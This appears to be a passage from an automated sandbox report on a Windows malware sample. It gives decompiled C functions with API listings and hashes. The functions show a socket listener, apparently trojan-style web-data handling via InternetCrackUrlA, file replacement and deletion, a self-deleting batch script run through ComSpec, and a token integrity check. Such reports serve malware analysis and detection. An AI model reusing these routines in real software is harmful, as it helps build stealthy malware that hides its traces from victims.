        						__eflags = _t107 - 0xffffffff;
        						if(_t107 == 0xffffffff) {
        							goto L14;
        						}
        						goto L13;
        					}
        					_t119 = _v20;
        					__eflags =  *_t119 & 0x00000003;
        					if(( *_t119 & 0x00000003) == 0) {
        						goto L9;
        					}
        					_t120 = E0040913B(_t119,  &_v76);
        					_v124 = _t120;
        					__eflags = _t120;
        					if(_t120 != 0) {
        						_v120 = 1;
        					} else {
        						_v125 = _t120;
        					}
        					goto L10;
        				} else {
        					SetLastError(0x2f78);
        					_v120 = _v120 & 0x00000000;
        					goto L23;
        				}
        			}

        APIs
          • Part of subcall function 004085D4: EnterCriticalSection.KERNEL32(0041EAA4), ref: 004085EF
          • Part of subcall function 004085D4: LeaveCriticalSection.KERNEL32(0041EAA4), ref: 00408672
        • SetLastError.KERNEL32(00002F78), ref: 0040FE8A
        • EnterCriticalSection.KERNEL32(0041EC60), ref: 0040FF31
        • LeaveCriticalSection.KERNEL32(0041EC60,?), ref: 0040FFE7
        • EnterCriticalSection.KERNEL32(0041EC60), ref: 0041000E
        • LeaveCriticalSection.KERNEL32(0041EC60,?), ref: 0041004E
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeave$ErrorLast
        • String ID:
        • API String ID: 486337731-0
        • Opcode ID: ddbe302c3affdafc5001f5c9e62f006774170469e6a27250f69799d2767f235a
        • Instruction ID: e92ef40181787d94f9af9d4d56abd23c2f26d8fd392adcc07a221414a00d0bcb
        • Opcode Fuzzy Hash: ddbe302c3affdafc5001f5c9e62f006774170469e6a27250f69799d2767f235a
        • Instruction Fuzzy Hash: 25518D31504345DBD720DF29DC84A9ABBA0EF45328F104A3EF9A4A72F1C738D885CB89
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040F175(void* __ecx, void* __eflags) {
        				intOrPtr _v74;
        				signed int _v78;
        				char _v124;
        				char _v128;
        				long _v140;
        				void* _v144;
        				intOrPtr _v148;
        				void* _v152;
        				void* _v156;
        				void* _v160;
        				char _v164;
        				void* _v168;
        				signed int _v172;
        				long _v184;
        				void* __esi;
        				void* _t47;
        				long _t48;
        				void* _t49;
        				void* _t55;
        				long _t56;
        				long _t57;
        				long _t59;
        				intOrPtr _t64;
        				long _t65;
        				long _t69;
        				void* _t72;
        				long _t77;
        				signed int _t83;
        				intOrPtr* _t85;
        				signed int _t94;
        				long _t97;
        				signed int _t98;
        				void* _t100;
        
        				_t100 = (_t98 & 0xfffffff8) - 0xac;
        				_t83 = 2;
        				_t47 = E004069FD(__ecx, __eflags, 0x918317b5, _t83);
        				_v156 = _t47;
        				if(_t47 != 0) {
        					_t48 = E00406B23();
        					__eflags = _t48;
        					if(_t48 == 0) {
        						L26:
        						E004147B3(_v148);
        						_t49 = 0;
        						__eflags = 0;
        						L27:
        						return _t49;
        					}
        					E00404956(__ecx,  &_v124);
        					_t87 = _v78;
        					_t94 = E0040F0A4( &_v160, _v78,  &_v168) & 0x0000ffff;
        					__eflags = _t94;
        					if(_t94 != 0) {
        						L7:
        						__eflags = _t94 - _v74;
        						if(_t94 != _v74) {
        							E00404A11( &_v124);
        							_v78 = _t94;
        							E00404A69( &_v128);
        						}
        						_t55 =  *0x41ea9c; // 0x0
        						_v144 = _t55;
        						_t56 = _v152;
        						_v172 = 1;
        						__eflags = _t56;
        						if(_t56 != 0) {
        							_v140 = _t56;
        							_v172 = _t83;
        						}
        						_t57 = _v160;
        						__eflags = _t57;
        						if(_t57 != 0) {
        							_t87 = _v172;
        							_t20 =  &_v172;
        							 *_t20 = _v172 + 1;
        							__eflags =  *_t20;
        							 *(_t100 + 0x2c + _v172 * 4) = _t57;
        						}
        						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
        						__eflags = _t59;
        						if(_t59 <= 0) {
        							L25:
        							E004143C5(_t59, _v156);
        							E004143C5(CloseHandle(_v152), _v164);
        							CloseHandle(_v160);
        							goto L26;
        						} else {
        							_t85 = __imp__#1;
        							while(1) {
        								__eflags = _t59 - _v172;
        								if(_t59 >= _v172) {
        									goto L25;
        								}
        								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
        								__eflags = _t64 - _v152;
        								if(_t64 != _v152) {
        									__eflags = _t64 - _v160;
        									if(_t64 != _v160) {
        										while(1) {
        											L23:
        											_t65 =  *_t85(_v168, 0, 0);
        											_t97 = _t65;
        											__eflags = _t97 - 0xffffffff;
        											if(_t97 == 0xffffffff) {
        												break;
        											}
        											__imp__WSAEventSelect(_t97, 0, 0);
        											_v156 = 0;
        											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
        											E004143DB(_t87, _t97);
        											_t69 = E00412B3B(0x20000, E0040F12C, _t97);
        											__eflags = _t69;
        											if(_t69 == 0) {
        												E004143C5(_t69, _t97);
        											}
        										}
        										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
        										__eflags = _t59;
        										if(_t59 > 0) {
        											continue;
        										}
        										goto L25;
        									}
        									_t72 = _v164;
        									L20:
        									_v168 = _t72;
        									goto L23;
        								}
        								_t72 = _v156;
        								goto L20;
        							}
        							goto L25;
        						}
        					} else {
        						goto L4;
        					}
        					while(1) {
        						L4:
        						_t77 = WaitForSingleObject( *0x41ea9c, 0x3e8);
        						__eflags = _t77 - 0x102;
        						if(_t77 != 0x102) {
        							break;
        						}
        						_t87 = _v74;
        						_t94 = E0040F0A4( &_v156, _v74,  &_v164) & 0x0000ffff;
        						__eflags = _t94;
        						if(_t94 == 0) {
        							continue;
        						}
        						break;
        					}
        					__eflags = _t94;
        					if(_t94 == 0) {
        						goto L26;
        					}
        					goto L7;
        				}
        				_t49 = 1;
        				goto L27;
        			}

        APIs
          • Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E
        • WaitForSingleObject.KERNEL32(000003E8,?,?,918317B5,00000002), ref: 0040F1E0
        • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,918317B5), ref: 0040F271
        • accept.WS2_32(?,00000000,00000000), ref: 0040F2FD
        • WaitForMultipleObjects.KERNEL32(?,00000000,00000000,00000000), ref: 0040F311
        • CloseHandle.KERNEL32(?), ref: 0040F332
        • CloseHandle.KERNEL32(?), ref: 0040F341
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
        • String ID:
        • API String ID: 38240579-0
        • Opcode ID: 2bfbcb803a7d65ac97ce39781f5fae34228dbde4b9de0fe099c7bd476a8a889f
        • Instruction ID: 03fa2585404e0584e9edb39c913ccfe61fbe07955eddfaf14f33c9b2e8c747b4
        • Opcode Fuzzy Hash: 2bfbcb803a7d65ac97ce39781f5fae34228dbde4b9de0fe099c7bd476a8a889f
        • Instruction Fuzzy Hash: FA518C75108241ABC720EF66DC84C6FBBE9EBC4714F100A3EF991E35A0D7399C488B1A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00408A1C(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed short* _v28;
        				signed int _v32;
        				signed short* _v36;
        				signed short* _v40;
        				signed int _v44;
        				signed short* _v48;
        				char _v52;
        				signed int _v56;
        				intOrPtr _v60;
        				struct _SYSTEMTIME _v76;
        				signed int _v92;
        				signed int _v104;
        				intOrPtr _v108;
        				intOrPtr _v112;
        				signed short _v116;
        				char _v120;
        				char _v124;
        				char _v140;
        				char _v184;
        				intOrPtr _v232;
        				char* _v236;
        				void* _v252;
        				char _v256;
        				char _v272;
        				struct _SYSTEMTIME _v288;
        				char _v552;
        				char _v1072;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t158;
        				signed int _t159;
        				intOrPtr _t160;
        				signed int _t168;
        				void* _t188;
        				void* _t199;
        				signed int _t211;
        				signed int _t215;
        				signed int _t218;
        				signed char _t222;
        				signed int _t224;
        				void* _t227;
        				void* _t228;
        				signed int _t229;
        				signed int _t230;
        				signed int _t240;
        				void* _t242;
        				signed int _t250;
        				intOrPtr* _t252;
        				signed int _t253;
        				signed short _t256;
        				short* _t259;
        				void* _t278;
        				signed short* _t282;
        				signed int _t287;
        				long _t288;
        				signed short* _t290;
        				signed short* _t292;
        				signed int _t295;
        				intOrPtr* _t297;
        				void* _t301;
        				void* _t302;
        
        				_v44 = _v44 & 0x00000000;
        				if(__eax == 0) {
        					L52:
        					asm("sbb eax, eax");
        					return  ~0x00000000;
        				} else {
        					_t282 = __ecx + 0x10;
        					_v28 = _t282;
        					_v52 = __eax;
        					do {
        						_t256 =  *_t282;
        						_t277 =  *(_t282 - 0x10) >> 0x0000000a & 0x00000008;
        						_v56 = _t277;
        						if(_t256 == 0) {
        							_t252 = _a8;
        							L6:
        							_t257 = _t282[2];
        							_v24 = _v24 & 0x00000000;
        							_v12 = _v12 & 0x00000000;
        							_t158 = _t257 + _t282[4];
        							_v60 = _t158;
        							if(_t257 >= _t158) {
        								L35:
        								_t159 =  *(_t282 - 0x10);
        								_t288 = 0;
        								if((_t159 & 0x00000008) != 0 && _v24 != 0) {
        									if((_t159 & 0x00000200) == 0) {
        										_t253 = E00411346(_t159 | 0xffffffff, 0, _a4);
        										__eflags = _t253;
        										if(_t253 != 0) {
        											_t188 = 6;
        											E0040CA33(_t188,  &_v124);
        											_push(_v24);
        											E00410F70(_t257, _t277, __eflags, 0xc9, _t253, 0,  &_v124, _t253);
        											_t302 = _t302 + 0x18;
        											E00411106(_t253);
        										}
        									} else {
        										_t278 = 0x3c;
        										E004111B9( &_v252,  &_v252, 0, _t278);
        										_v236 =  &_v552;
        										_v252 = _t278;
        										_v232 = 0x103;
        										if(InternetCrackUrlA(_a4, 0, 0,  &_v252) == 1 && _v232 > 0) {
        											GetSystemTime( &_v76);
        											_t300 =  &_v140;
        											_t199 = 5;
        											E0040CA33(_t199,  &_v140);
        											_push(_v76.wDay & 0x0000ffff);
        											_push(_v76.wMonth & 0x0000ffff);
        											_push((_v76.wYear & 0x0000ffff) - 0x7d0);
        											_push( &_v552);
        											E00411DF9( &_v140, 0x104,  &_v1072, _t300);
        											_t302 = _t302 + 0x14;
        											E00410E2E(_t257, 0x104, 2, 0,  &_v1072, _v24, _v12);
        											_t282 = _v28;
        										}
        									}
        									E00411106(_v24);
        									_t288 = 0;
        								}
        								if( *((intOrPtr*)(_t282 - 4)) != _t288) {
        									if(( *(_t282 - 0x10) & 0x00000010) == 0) {
        										EnterCriticalSection(0x41eaa4);
        										E00411106( *0x41eabc);
        										_t168 = E00411564(E00411106( *0x41eac0) | 0xffffffff,  *((intOrPtr*)(_t282 - 0xc)));
        										 *0x41eabc = _t168;
        										__eflags = _t168 | 0xffffffff;
        										 *0x41eac0 = E00411564(_t168 | 0xffffffff,  *((intOrPtr*)(_t282 - 4)));
        										LeaveCriticalSection(0x41eaa4);
        										goto L51;
        									}
        									E00406DAC( &_v256, _t257, 1,  &_v184);
        									if(E004123AB( &_v272,  *((intOrPtr*)(_t282 - 4)), E00411C43( *((intOrPtr*)(_t282 - 4)))) == 0) {
        										goto L51;
        									}
        									_t259 =  &_v256;
        									do {
        										E0041146E( *((intOrPtr*)(_t301 + _t288 - 0x10c)), _t259);
        										_t288 = _t288 + 1;
        										_t259 = _t259 + 4;
        									} while (_t288 < 0x10);
        									 *_t259 = 0;
        									GetLocalTime( &_v288);
        									E0041522E(_t259,  &_v184,  &_v256, 3,  &_v288, 0x10);
        								}
        								goto L51;
        							} else {
        								goto L9;
        								L13:
        								_t277 =  *_t211 & 0x0000ffff;
        								if(_t277 != 4) {
        									_t257 = _t211 + 4;
        									_t218 = E00407BFB(_v56, _t211 + 4, 0,  &_v20, _t277 - 4,  *_t252 + _v16,  *_a12 - _v16);
        									__eflags = _t218;
        									if(_t218 == 0) {
        										L33:
        										if(_v48 < _v60) {
        											_t257 = _v48;
        											L9:
        											_t211 = _t257 + ( *_t257 & 0x0000ffff);
        											_t290 = ( *_t211 & 0x0000ffff) + _t211;
        											_v48 = _t290 + ( *_t290 & 0x0000ffff);
        											_t277 =  *_t257 & 0x0000ffff;
        											_v40 = _t257;
        											_v32 = _t211;
        											_v36 = _t290;
        											if(( *_t257 & 0x0000ffff) != 4) {
        												goto L11;
        											} else {
        												_v16 = _v16 & 0x00000000;
        												goto L13;
        											}
        										}
        										_t282 = _v28;
        										goto L35;
        									}
        									__eflags =  *_v40 - 4;
        									_t292 = _v36;
        									if( *_v40 != 4) {
        										_t54 =  &_v20;
        										 *_t54 = _v20 + _v16;
        										__eflags =  *_t54;
        									} else {
        										_v16 = _v20;
        									}
        									L22:
        									_t257 = _v20 - _v16;
        									_t222 =  *(_v28 - 0x10);
        									_t287 = ( *_t292 & 0x0000ffff) - 4;
        									_v32 = _t257;
        									if((_t222 & 0x00000004) == 0) {
        										__eflags = _t222 & 0x00000008;
        										if((_t222 & 0x00000008) != 0) {
        											_t224 = E00411091(_t257 + _t287 + _v12 + 2,  &_v24);
        											__eflags = _t224;
        											if(_t224 != 0) {
        												_t295 = _v24;
        												__eflags = _t287;
        												if(_t287 != 0) {
        													E00411142(_v12 + _t295,  &(_v36[2]), _t287);
        													_t84 =  &_v12;
        													 *_t84 = _v12 + _t287;
        													__eflags =  *_t84;
        												}
        												_t277 = _v32;
        												_t227 = E00411142(_v12 + _t295,  *_t252 + _v16, _t277);
        												_t257 = _v28;
        												__eflags =  *(_t257 - 0x10) & 0x00000100;
        												if(( *(_t257 - 0x10) & 0x00000100) == 0) {
        													_t228 = E00415AE6(_t227, _t277);
        													_t95 =  &_v12;
        													 *_t95 = _v12 + _t228;
        													__eflags =  *_t95;
        													_t252 = _a8;
        												} else {
        													_v12 = _v12 + _t277;
        												}
        												_t229 = _v12;
        												 *((char*)(_t229 + _t295)) = 0xa;
        												_t230 = _t229 + 1;
        												__eflags = _t230;
        												_v12 = _t230;
        												 *((char*)(_t230 + _t295)) = 0;
        											}
        										}
        									} else {
        										_v40 =  *_a12 - _t257 + _t287;
        										_t240 = E004110D6( *_a12 - _t257 + _t287);
        										_v32 = _t240;
        										if(_t240 != 0) {
        											_t277 = _v16;
        											_t242 = E00411142(E00411142(_t240,  *_t252, _v16) + _v16,  &(_t292[2]), _t287);
        											_t297 = _a12;
        											_t257 =  *_t252 + _v20;
        											E00411142(_t242 + _t287 + _v16,  *_t252 + _v20,  *_t297 - _v20);
        											E00411106( *_t252);
        											_v44 = _v44 + 1;
        											 *_t252 = _v32;
        											 *_t297 = _v40;
        										}
        									}
        									goto L33;
        								}
        								if( *_t257 != _t277) {
        									_t250 = _v16;
        								} else {
        									_t250 =  *_a12;
        								}
        								_v20 = _t250;
        								goto L22;
        								L11:
        								_t215 = E00407BFB(_v56, _t257,  &_v16, 0, _t277 - 4,  *_t252,  *_a12);
        								__eflags = _t215;
        								if(_t215 == 0) {
        									goto L33;
        								}
        								_t257 = _v40;
        								_t292 = _v36;
        								_t211 = _v32;
        								goto L13;
        							}
        						}
        						_v120 = 0x2a3f;
        						_v116 = _t256;
        						_t160 = E00411C43(_t256);
        						_t252 = _a8;
        						_v112 = _t160;
        						_v108 =  *_t252;
        						_t277 = _t277 | 0x00000012;
        						_v104 =  *_a12;
        						_v92 = _t277;
        						if(E0041208A( &_v120) != 0) {
        							goto L6;
        						}
        						L51:
        						_t282 =  &(_t282[0xe]);
        						_t150 =  &_v52;
        						 *_t150 = _v52 - 1;
        						_v28 = _t282;
        					} while ( *_t150 != 0);
        					goto L52;
        				}
        			}

        APIs
        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00408CC1
        • GetSystemTime.KERNEL32(?), ref: 00408CE0
        • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 00408DE8
        • EnterCriticalSection.KERNEL32(0041EAA4), ref: 00408E14
        • LeaveCriticalSection.KERNEL32(0041EAA4,00000000,?), ref: 00408E51
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
        • String ID: ?*
        • API String ID: 2400141425-3267162389
        • Opcode ID: 77640a6e9717e3573cd5425ec82b8bd857a03d920a0eb10a52e76367dd35d802
        • Instruction ID: aaa1df131d7b30b29749126411739104fdf5366701180ffaec2c7863ade85a5e
        • Opcode Fuzzy Hash: 77640a6e9717e3573cd5425ec82b8bd857a03d920a0eb10a52e76367dd35d802
        • Instruction Fuzzy Hash: D3E18D71D00219AFDF10DFA9C980AEEB7B5FF48304F10456AE955B7291D738AA81CF68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E004108E5(signed int __ecx, short _a4) {
        				char _v268;
        				signed short _v300;
        				char _v646;
        				signed int _v940;
        				char _v1012;
        				short _v1532;
        				short _v1536;
        				signed int _v1540;
        				short _v1544;
        				void* _v1548;
        				intOrPtr _v1552;
        				intOrPtr _v1556;
        				char _v1560;
        				signed int _v1568;
        				WCHAR* _v1572;
        				signed int _v1576;
        				long _v1580;
        				signed int _v1584;
        				signed int _v1585;
        				void* __ebx;
        				void* __esi;
        				signed int _t61;
        				void* _t62;
        				signed int _t70;
        				signed int _t72;
        				unsigned int _t74;
        				signed int _t81;
        				signed int _t84;
        				long _t85;
        				long _t86;
        				signed int _t90;
        				signed int _t102;
        				signed int _t111;
        				signed int _t114;
        				struct _SECURITY_ATTRIBUTES* _t125;
        				WCHAR* _t132;
        				short _t136;
        				void* _t139;
        				void* _t143;
        				signed int _t144;
        
        				_t133 = __ecx;
        				_t136 = _a4;
        				_t125 = 0;
        				_push(2);
        				if( *(_t136 + 0x330) == 0) {
        					_push(0xcd9508fd);
        				} else {
        					_t151 =  *_t136;
        					_push(((0 |  *_t136 != 0x00000000) - 0x00000001 & 0xa3e26067) + 0x93f52fc5);
        				}
        				_t61 = E004069FD(_t133, _t151);
        				_v1584 = _t61;
        				if(_t61 != _t125) {
        					_t62 =  *0x41ea9c; // 0x0
        					_v1548 = _t62;
        					_v1544 =  &_v268;
        					_v1556 = E00410741;
        					_v1552 = E0041087D;
        					_v1536 = _t136;
        					E00406C9C( &_v1012);
        					E00411142( &_v268,  &_v646, 0x102);
        					_t70 = ( *_t136 & 0x000000ff) - _t125;
        					__eflags = _t70;
        					if(_t70 == 0) {
        						_t72 = _v300 >> 0x10;
        						__eflags = _t72;
        						_v1580 = _t72;
        						_v1584 = _v300 & 0x0000ffff;
        						L10:
        						_t74 = _v1580;
        						L11:
        						_v1580 = _t74 * 0xea60;
        						_v1584 = _v1584 * 0xea60;
        						E004111B9( &_v1012,  &_v1012, _t125, 0x2e8);
        						_v1544 = 0;
        						_t81 = E00406B23();
        						__eflags = _t81;
        						if(_t81 == 0) {
        							L39:
        							E004147B3(_v1576);
        							_t139 = 0;
        							goto L5;
        						} else {
        							goto L12;
        						}
        						do {
        							L12:
        							_v1585 = 1;
        							__eflags =  *_t136 - _t125;
        							if( *_t136 != _t125) {
        								L27:
        								_t84 = E004091CB();
        								_t141 = _t84;
        								__eflags = _t84;
        								if(__eflags != 0) {
        									_v1572 = E00416A93(0, _t134, __eflags, _t141, 0x4e23, 0x10000000);
        									E00411106(_t141);
        									__eflags = _v1576;
        									if(_v1576 != 0) {
        										_v1540 = _v1540 & 0;
        										__eflags = E004104D7(_t133, _t134,  &_v1540, 1);
        										if(__eflags != 0) {
        											 *(_t136 + 8) =  *(_t136 + 8) | 0xffffffff;
        											_t111 = E00410D30( &_v1560, _t133, __eflags);
        											__eflags = _t111;
        											_t114 = (_t111 & 0xffffff00 | _t111 != 0x00000000) - 0x00000001 & 0x00000002;
        											__eflags = _t114;
        											_v1585 = _t114;
        											E00416EC0(_t136 + 8);
        											E00411106(_v1540);
        										}
        									}
        									E00411106(_v1560);
        								}
        								L32:
        								_t125 = 0;
        								__eflags =  *(_t136 + 0x330);
        								if( *(_t136 + 0x330) == 0) {
        									goto L39;
        								}
        								goto L33;
        							}
        							asm("sbb ebx, ebx");
        							E00410396( !( ~(_v1532 & 0x0000ffff)) &  &_v1532, _t133, 0);
        							_t132 = _t136 + 0x122;
        							_t90 = GetFileAttributesW( &_v1536);
        							__eflags = _t90 - 0xffffffff;
        							if(_t90 == 0xffffffff) {
        								_t90 = GetFileAttributesW(0x41ec80);
        								__eflags = _t90 - 0xffffffff;
        								if(_t90 == 0xffffffff) {
        									goto L32;
        								}
        								_t133 = 0x41ec80;
        								L17:
        								_t134 = _t132;
        								E004114A7(_t90 | 0xffffffff, _t133, _t134);
        								_t143 = CreateFileW(_t132, 0x80000000, 7, 0, 3, 0, 0);
        								__eflags = _t143 - 0xffffffff;
        								if(_t143 == 0xffffffff) {
        									L35:
        									E0041621B(_t132);
        									goto L32;
        								}
        								_v1576 = E004161F4(_t133, _t143);
        								_v1572 = _t134;
        								CloseHandle(_t143);
        								__eflags = _v1576 - 0xffffffff;
        								if(_v1576 != 0xffffffff) {
        									L20:
        									__eflags = _v1568;
        									if(__eflags > 0) {
        										goto L35;
        									}
        									if(__eflags < 0) {
        										L23:
        										__eflags = lstrcmpiW(_t132,  &_v1532);
        										if(__eflags == 0) {
        											goto L27;
        										}
        										_t144 = E004069FD(_t133, __eflags, 0x404a9f61, 2);
        										__eflags = _t144;
        										if(_t144 == 0) {
        											goto L32;
        										}
        										_t102 = MoveFileExW(_t132,  &_v1532, 0xb);
        										__eflags = _t102;
        										if(_t102 == 0) {
        											goto L32;
        										}
        										E004147B3(_t144);
        										__eflags = _t102 | 0xffffffff;
        										_t133 =  &_v1536;
        										_t134 = _t132;
        										E004114A7(_t102 | 0xffffffff,  &_v1536, _t132);
        										goto L27;
        									}
        									__eflags = _v1572 - 0xffffffff;
        									if(_v1572 > 0xffffffff) {
        										goto L35;
        									}
        									goto L23;
        								}
        								__eflags = _v1568;
        								if(_v1568 == 0) {
        									goto L35;
        								}
        								goto L20;
        							}
        							_t133 =  &_v1532;
        							goto L17;
        							L33:
        							__eflags = _v1585 - 2;
        							if(_v1585 != 2) {
        								_t85 = _v1580;
        								__eflags = _v1585;
        								if(_v1585 != 0) {
        									_t85 = 0x7530;
        								}
        							} else {
        								_t85 = _v1584;
        							}
        							_t86 = WaitForSingleObject( *0x41ea9c, _t85);
        							__eflags = _t86 - 0x102;
        						} while (_t86 == 0x102);
        						goto L39;
        					}
        					__eflags = _t70 != 1;
        					if(_t70 != 1) {
        						goto L10;
        					} else {
        						_t133 = _v940 & 0x0000ffff;
        						_t74 = _v940 >> 0x10;
        						_v1584 = _v940 & 0x0000ffff;
        						goto L11;
        					}
        				} else {
        					_t139 = 1;
        					L5:
        					E00411106(_t136);
        					return _t139;
        				}
        			}

        APIs
        • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002E8,?,?,00000102), ref: 00410A41
        • GetFileAttributesW.KERNEL32(0041EC80), ref: 00410A53
        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00410A7C
        • CloseHandle.KERNEL32(00000000,00000000), ref: 00410A9C
        • lstrcmpiW.KERNEL32(?,?), ref: 00410AD2
        • MoveFileExW.KERNEL32(?,?,0000000B,404A9F61,00000002), ref: 00410AFA
        • WaitForSingleObject.KERNEL32(?,?,00000000,000002E8,?,?,00000102), ref: 00410BC5
          • Part of subcall function 0041621B: SetFileAttributesW.KERNEL32(00000080,00000080,00418BFB,?), ref: 00416224
          • Part of subcall function 0041621B: DeleteFileW.KERNEL32(?), ref: 0041622E
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Attributes$CloseCreateDeleteHandleMoveObjectSingleWaitlstrcmpi
        • String ID:
        • API String ID: 2659724836-0
        • Opcode ID: 4acc7dcb9d70a8efcb66f20cc0f26d8c0f2615cf471acdd8f1d53ea4a5630f9b
        • Instruction ID: cde1777e5d6a8032b97940991e31f3e7693a02ee78bee4335ed559b846239d4c
        • Opcode Fuzzy Hash: 4acc7dcb9d70a8efcb66f20cc0f26d8c0f2615cf471acdd8f1d53ea4a5630f9b
        • Instruction Fuzzy Hash: CB71E3715083419AD320DFB4CC81AEBBBE4AF45358F100A2FF595E62A2D778D9C4C79A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00412BC6(void* __ebx, void* __edi, char _a4) {
        				short _v24;
        				intOrPtr _v28;
        				char _v72;
        				short _v592;
        				char _v852;
        				char _v1392;
        				void* _t35;
        				char _t56;
        
        				if(E0041623C(L"bat",  &_v592) == 0) {
        					L7:
        					return 0;
        				}
        				CharToOemW( &_v592,  &_v852);
        				_push( &_v852);
        				if(E00411ECA( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
        					L6:
        					E0041621B( &_v592);
        					goto L7;
        				}
        				_t35 = E00416070( &_v592, _a4, _t31);
        				E00411106(_a4);
        				if(_t35 == 0) {
        					goto L6;
        				}
        				_push(__edi);
        				_push( &_v592);
        				if(E00411DF9( &_v592, 0x10e,  &_v1392,  &M0040451C) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
        					goto L6;
        				} else {
        					_t56 = 0x44;
        					E004111B9( &_v72,  &_v72, 0, _t56);
        					_v24 = 0;
        					_v72 = _t56;
        					_v28 = 1;
        					return E004129CD( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
        				}
        			}

        APIs
          • Part of subcall function 0041623C: GetTempPathW.KERNEL32(000000F6,?), ref: 00416253
        • CharToOemW.USER32 ref: 00412BF6
          • Part of subcall function 00416070: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
          • Part of subcall function 00416070: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
          • Part of subcall function 00416070: CloseHandle.KERNEL32(00000000), ref: 004160BA
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00412C7A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
        • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
        • API String ID: 1639923935-3344086482
        • Opcode ID: 1c7a324f8f4a74ccbeab4c657a80be9a4363ddaafb707f3c261a8d506b899358
        • Instruction ID: 82ea3152fa0d3881ef5ff950779b7ed3397b8e81fa1a0c2d04cc2355d8176a93
        • Opcode Fuzzy Hash: 1c7a324f8f4a74ccbeab4c657a80be9a4363ddaafb707f3c261a8d506b899358
        • Instruction Fuzzy Hash: F92180B194110C6ADB10EBA4DD46FEF77BCEB04314F2041A7B708E3191E6789AD58BA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E0041285A(void* __ecx) {
        				long _v8;
        				void* _v12;
        				char* _t21;
        				signed char _t22;
        				DWORD* _t25;
        				void* _t32;
        
        				_t28 = 0;
        				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
        					L14:
        					return _t28;
        				}
        				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L13:
        					CloseHandle(_v12);
        					goto L14;
        				} else {
        					_t32 = E004110D6(_v8);
        					if(_t32 == 0) {
        						L12:
        						goto L13;
        					}
        					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
        						_t21 = GetSidSubAuthorityCount( *_t32);
        						if(_t21 != 0) {
        							_t22 =  *_t21;
        							if(_t22 > 0) {
        								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
        								if(_t25 != 0) {
        									if( *_t25 >= 0x2000) {
        										asm("sbb bl, bl");
        										_t28 = 3;
        									} else {
        										_t28 = 1;
        									}
        								}
        							}
        						}
        					}
        					E00411106(_t32);
        					goto L12;
        				}
        			}

        APIs
        • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 0041286A
        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 0041288A
        • GetLastError.KERNEL32(?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 00412890
        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128B7
